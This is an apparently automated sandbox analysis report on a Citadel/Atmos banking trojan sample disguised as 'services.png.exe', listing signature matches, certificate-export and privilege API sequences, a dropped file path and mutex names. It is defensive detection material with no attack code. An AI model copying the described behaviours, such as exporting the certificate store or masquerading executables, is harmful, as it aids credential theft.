Source: 00000000.00000002.2171781778.0000000002B50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 00000005.00000000.1737083449.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 00000005.00000000.1737083449.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 00000005.00000000.1737083449.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 00000001.00000000.1699967711.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 00000013.00000003.2022956144.0000000000180000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 00000013.00000003.2022956144.0000000000180000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 00000013.00000003.2022956144.0000000000180000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 00000020.00000000.2109775705.0000000002530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 00000020.00000000.2109775705.0000000002530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 0000000F.00000000.1955460926.0000000000290000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 0000000F.00000000.1955460926.0000000000290000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 0000000F.00000000.1955460926.0000000000290000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 0000000F.00000003.1965679095.0000000000290000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 0000000F.00000003.1965679095.0000000000290000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 0000000F.00000003.1965679095.0000000000290000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 00000028.00000002.2974532793.0000000002390000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 00000028.00000002.2974532793.0000000002390000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 00000010.00000003.1981080900.0000000000580000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 00000010.00000003.1981080900.0000000000580000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 00000010.00000003.1981080900.0000000000580000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 00000007.00000003.1765021497.0000000000D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 00000007.00000003.1765021497.0000000000D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 00000007.00000003.1765021497.0000000000D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 00000018.00000003.2075250679.0000000000FB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 00000018.00000003.2075250679.0000000000FB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 00000018.00000003.2075250679.0000000000FB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 00000021.00000000.2113078053.0000000002E50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 00000021.00000000.2113078053.0000000002E50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 00000012.00000003.2000454832.0000000000900000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 00000012.00000003.2000454832.0000000000900000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 00000012.00000003.2000454832.0000000000900000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 00000011.00000003.1997224283.00000000003D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 00000011.00000003.1997224283.00000000003D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 00000011.00000003.1997224283.00000000003D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 00000001.00000003.2627357615.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 00000001.00000003.2627357615.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 0000001B.00000003.2091183123.0000000000E20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 0000001B.00000003.2091183123.0000000000E20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 0000001B.00000003.2091183123.0000000000E20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 00000027.00000000.2129746271.0000000002B30000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 00000027.00000000.2129746271.0000000002B30000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 0000001C.00000000.2091409743.0000000000810000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 0000001C.00000000.2091409743.0000000000810000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 0000001C.00000000.2091409743.0000000000810000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0

Source: classification engine

Classification label: mal100.phis.bank.troj.spyw.evad.winEXE@10/32@9/5

Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_0042CC39 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,	0_2_0042CC39
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_0042CDAE CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,	0_2_0042CDAE
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_0283CC39 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,	0_2_0283CC39
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_0283CDAE CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,	0_2_0283CDAE
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Code function: 1_2_0042CC39 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,	1_2_0042CC39
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Code function: 1_2_0042CDAE CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,	1_2_0042CDAE

Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_0043412F GetCurrentThread,OpenThreadToken,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,	0_2_0043412F
Source: C:\Users\user\Desktop\services.png.exe	Code function: 0_2_0284412F GetCurrentThread,OpenThreadToken,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,	0_2_0284412F
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Code function: 1_2_0043412F GetCurrentThread,OpenThreadToken,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,	1_2_0043412F

Source: C:\Users\user\Desktop\services.png.exe

Code function: 0_2_00437828 CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,CloseHandle,Process32NextW,CloseHandle,

0_2_00437828

Source: C:\Users\user\Desktop\services.png.exe

Code function: 0_2_0043E06E CoCreateInstance,VariantInit,SysAllocString,VariantClear,

0_2_0043E06E

Source: C:\Users\user\Desktop\services.png.exe

File created: C:\Users\user\AppData\Roaming\Azockavulie

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0ED6156040A959113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D07560560492949113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0496E5604AE9A9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0F96D56041E999113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D08170560466849113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\4E9E1087FCAEF1D723957950C461BE47
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D04D685604AA9C9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0F561560412959113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D041695604A69D9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0917E5604768A9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0A57D560442899113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\C05314A87263F5F823957950C461BE47
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0397D5604DE899113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0756B5604929F9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0D171560436859113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0BD6156045A959113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0516B5604B69F9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0796856049E9C9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\DB9E102569AEF17523957950C461BE47
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0D57D560432899113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D06561560482959113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0E97156040E859113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0D56B5604329F9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0E174560406809113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0FD6056041A949113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D08D7E56046A8A9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D05D635604BA979113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\48AE68A7FA9E89F723957950C461BE47
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D00D625604EA969113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0DD7F56043A8B9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D02D785604CA8C9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D06D7956048A8D9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0B17B5604568F9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0917A5604768E9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0697F56048E8B9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D021605604C6949113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0896F56046E9B9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D04D795604AA8D9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D01D615604FA959113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0A163560446979113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0F97756041E839113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D045735604A2879113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0A96156044E959113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0216B5604C69F9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0B563560452979113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\26F463EC94C482BC23957950C461BE47
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0457A5604A28E9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0117F5604F68B9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\BBAB13DE099BF28E23957950C461BE47
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0A160560446949113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D001715604E6859113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D09572560472869113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D09176560476829113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0A95856044EAC9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0456D5604A2999113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0197F5604FE8B9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\0F6E7BC8BD5E9A9823957950C461BE47
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D07D7156049A859113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0CD7C56042A889113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0B17C560456889113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0F97E56041E8A9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0F576560412829113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0F56D560412999113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0DD6756043A939113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D07571560492859113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0C174560426809113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0416E5604A69A9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0BD7656045A829113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0F57F5604128B9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\5F9ABCC1EDAA5D9123957950C461BE47
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D00D7E5604EA8A9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0D97156043E859113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0E571560402859113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D07D7356049A879113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D07575560492819113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0BD6B56045A9F9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0E163560406979113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D03D7C5604DA889113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0E175560406819113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D015635604F2979113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0CD6E56042A9A9113
Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\ECD0F7805EE016D0B96256045E969113
